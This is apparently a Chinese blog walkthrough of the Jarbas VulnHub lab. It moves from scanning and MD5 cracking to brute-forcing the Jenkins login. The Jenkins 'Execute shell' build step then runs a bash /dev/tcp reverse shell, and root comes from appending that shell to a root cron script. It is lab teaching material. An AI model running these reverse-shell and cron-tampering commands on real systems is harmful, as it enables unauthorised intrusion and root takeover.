Henry's Blog
  • CobaltStrike系列
    • CobaltStrike的基本操作
    • CobaltStrike会话管理
    • CobaltStrike重定向服务
    • CobaltStrike钓鱼攻击
    • 凭据导出与存储
    • Beacon的常用操作
    • DnsBeacon详解
    • 权限提升
    • 简单的内网信息收集
    • Cross2生成LinuxShell
    • CNA插件开发
    • Profile编写规则
    • BOF开发
    • execute-assembly原理
    • Vps搭建可能遇到的问题
  • OPSEC(免杀)
    • BypassPPL
    • Certutil绕过技巧
    • DLL劫持技术(白+黑)
    • PEB伪装
    • PpidSpoofing
    • Python反序列化免杀
    • WebShell绕过技巧
    • mimikatz免杀
    • 利用CobaltStrikeProfile实现免杀
    • 利用Windows异常机制实现Bypass
    • 削弱WindowsDefender
    • 模拟Powershell实现Bypass
    • 浅谈CobaltStrikeUDRL
    • 添加用户和计划任务(Bypass)
    • 移除NtDll的hook
    • 定位修改MsfShellcode特征码实现免杀
    • 利用COM接口实现进程断链执行.md
    • 免杀工具篇
      • Invoke-Obfuscation
      • Shellter
    • 流量检测逃避
      • CobaltStrike流量逃避.md
      • MSF流量加密.md
      • NC反弹Shell流量加密.md
  • Shellcode加密
    • 前置知识
    • XOR加密
    • AES加密
  • Shellcode加载器
    • 常见的加载方式
    • 分离加载
    • 创建纤程加载
    • 动态调用API加载
    • 基于APC注入加载
    • 基于反调试加载
    • 基于回调函数加载
    • 基于线程池加载
    • 模块踩踏
    • 进程镂空注入(傀儡进程)
    • 反射dll注入(内嵌式)
  • Web渗透
    • 信息收集
    • 各类Webshell
    • 基本漏洞利用
    • 远程命令执行漏洞
    • sql注入
    • sqlmap的使用方法
  • 内网渗透
    • 内网渗透前置知识
    • BadUsb制作
    • Linux反弹Shell总结
    • 内网渗透技术总结
    • 横向移动
      • GoToHttp
      • MS14-068
      • PassTheHash
      • PassTheTicket
      • Psexec
      • RustDesk
      • SMB横移
      • WMI横移
      • 用户枚举与爆破
    • 流量加密
      • CobaltStrike流量加密
      • MsfShell流量加密
      • OpenSSL加密反弹shell
  • 协议分析
    • TCP_IP协议
  • 权限提升
    • 土豆提权原理
    • UAC提权
  • 蓝队技术
    • 应急响应流程总结
  • 进程注入
    • Conhost注入
    • session0注入
    • 内核回调表注入
    • 剪切板注入
  • 逆向技术
    • HOOK技术
    • IDA遇到的坑
    • Shellcode的原理与编写
    • Windbg的使用
    • 使用Stardust框架编写Shellcode
    • PeToShellcode
    • 破解系列
      • PUSH窗体大法
      • VM绕过技巧(易语言)
      • Crackme_1
      • 反破解技术
      • 按钮事件特征码
      • 逆向调试符号
      • 破解实例
        • IDA逆向注册码算法
  • 钓鱼技术
    • Flash网页钓鱼
    • LNK钓鱼
    • 自解压程序加载木马
  • 隧道应用
    • 隧道应用前置知识
    • BurpSuite上游代理
    • DNS隧道传输
    • EarthWorm内网穿透
    • Frp内网穿透
    • ICMP隧道传输
    • MsfPortfwd端口转发
    • Neo-reGeorg内网穿透
    • NetCat工具使用
    • Netsh端口转发
    • SSH端口转发
    • 正向连接与反向连接
  • 基础学习
    • C和C++
      • C++编程
      • C程序设计
    • Linux学习
      • Linux Shell编程
      • linux基础
    • Python基础
      • python之Socket编程
      • python之多线程操作
      • python基础
      • python算法技巧
    • Qt基础
      • Qt笔记
    • 逆向基础
      • PE结构
      • Win32
      • 汇编语言
  • 漏洞复现
    • Web漏洞
      • ApacheShiro反序列化漏洞
    • 系统漏洞
      • Linux漏洞
        • ShellShock(CVE-2014-6271)
  • 靶场系列
    • Web靶场
      • pikachu靶场
      • sqli-labs
      • upload-labs
    • 内网靶场
      • Jarbas靶场
      • SickOS靶场
      • W1R3S靶场
      • prime靶场
      • vulnstack靶场系列一
      • vulnstack靶场系列二
      • vulnstack靶场系列四
  • 代码审计
    • PHP代码审计基础
  • 一些杂七杂八的
    • 开发工具与环境
      • Github的使用
      • JSP环境搭建
      • Pycharm设置代码片段
      • VS2017安装番茄助手(破解版)
      • VisualStudio项目模板的使用
      • WindowsServer搭建IIS环境
      • 安装Scoop
      • c++安装vcpkg
      • dotnet-cnblog的安装与使用
      • gitbook使用教程
      • kali安装burpsuite
      • 配置win2012域服务器
      • VSCode配置MinGW
    • 踩坑记录
      • BurpSuite导入证书
      • Powershell禁止执行脚本
      • centos7没有显示ip
      • kali安装pip2
      • oracle12没有scott用户
由 GitBook 提供支持
在本页
  • 靶场考察点
  • 1.Jenkis平台的漏洞利用
  • 2.contrab提权
  • 3.登录爆破
  • 靶场搭建
  • 渗透步骤
  • 信息收集
  • Web渗透
  • 系统提权
  1. 靶场系列
  2. 内网靶场

Jarbas靶场

靶场考察点

1.Jenkis平台的漏洞利用

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成

2.contrab提权

在LINUX系统中的/etc/contrab文件存放着系统定时任务, 若该文件的某些定时任务指定由root用户执行, 那么这将是一个可提权点

3.登录爆破

使用burpsuite对网站后台登录进行爆破

靶场搭建

Jarbas靶场下载地址: https://download.vulnhub.com/jarbas/Jarbas.zip

渗透步骤

信息收集

1.确定靶机ip

扫描C段ip的存活主机: nmap -sn 192.168.47.0/24, 确定目标主机的IP为192.168.47.156

2.端口扫描

分别使用tcp和udp扫描目标主机的开放端口, 显示开放的端口有22、80、3306、8080

nmap -p- 192.168.47.156
nmap -sU -V -p22,80,3306,8080 192.168.47.156

nmap使用web漏扫脚本进行扫描, 扫描结果并不太理想, 显示在8080端口处有一个robots.txt

nmap --script=vuln -p21,22,80,3306 192.168.47.156

访问robots.txt, 页面信息为"我们不想机器人去点击'建立'连接", 作者不想"build"被点击, 那么这个"build"后续很可能会出现且可利用

访问http://192.168.47.156:8080, 显示登录页面, 可用于后续的爆破

3.目录爆破

对http://192.168.47.156:80进行目录爆破, 爆出access.html

python3 dirsearch.py -u http://192.168.47.156 -x 403

访问http://192.168.47.156:80/access.html, 页面显示三段未加密字符对应MD5加密字符串,依照以往的经验这可能是用户的账号及密码

经过在线网站的破解后, 密码字符串分别为italia、vipsu、mariana, 最终账号对应密码如下所示:

  • tiago- > italia

  • trindade -> vipus

  • eder -> mariana

使用上述的账号密码尝试登录, 全部登录失败, 后续尝试使用burpsuite打乱顺序进行爆破

Web渗透

1.登录爆破

使用burpsuite进行爆破, 攻击类型选择Clusterbomb, 爆破参数分别是j_username和j_password, 爆破的字典填写上述用户的账号密码

从响应长度可判断出eder/mariana或eder/vipsu都可能为正确的账号密码, 经过登录尝试后, 确定后者才是正确的账号密码

由后台页面可知, 这是一个Jenkins平台, 这就要考察我们对该平台漏洞利用的了解

2.Jenkins远程命令执行反弹shell

在构建栏处发现一处能够远程命令执行的地方, 选择Execute shell, 随后输入/bin/bash -i >& /dev/tcp/192.168.47.155/4444 0>&1, 该命令的作用是反弹目标主机的shell, 然后点击应用加保存

在kali监听本机的4444端口来接收反弹Shell: nc -lvp 4444, 随后点击立即构建触发上述设置的远程命令,后续在kali收到反弹的shell

通常以这种方式获取的反弹shell, 我们称之为非交互式shell

  • 交互式shell: shell等待你的输入并且执行你提交的命令, 这种模式也是大多数用户非常熟悉的

  • 非交互式shell: shell不与你进行交互,而是读取存放在文件中的命令,并且执行它们, 当它读到文件的结尾,shell也就终止了

系统提权

1.收集当前用户信息

查看当前用户: whoami, 显示当前用户为jenkins

查看当前用户权限: sudo -l, 结果显示没有任何权限

​

2.crontab提权

查看系统定时任务: cat /etc/crontab, 发现有一个任务使用root用户执行shell脚本

查看shell脚本的内容: cat /etc/script/CleaningScript.sh, 发现这是一个删除日志的脚本

将反弹Shell的命令写入脚本文件, 这样一来就能获取root权限的反弹shell了

echo "/bin/bash -i >& /dev/tcp/192.168.47.155/4444 0>&1" >> /etc/script/CleaningScript.sh

重新建立nc监听, 过5分钟后就能接收到反弹的root权限shell

获取flag.txt

上一页内网靶场下一页SickOS靶场

最后更新于1年前

在Jenkins平台新建一个任务

image-20221124230218824
image-20221124233435735
image-20221124233440334
image-20221124233935822
image-20221125090817640
image-20221125093938352
image-20221125091907048
image-20221125155317577
image-20221125155433328
image-20221125211409283
image-20221125221304286
image-20221125221342646
image-20221125222821487
image-20221125223338183
image-20221125223530489
image-20221125224814118
image-20221126000715869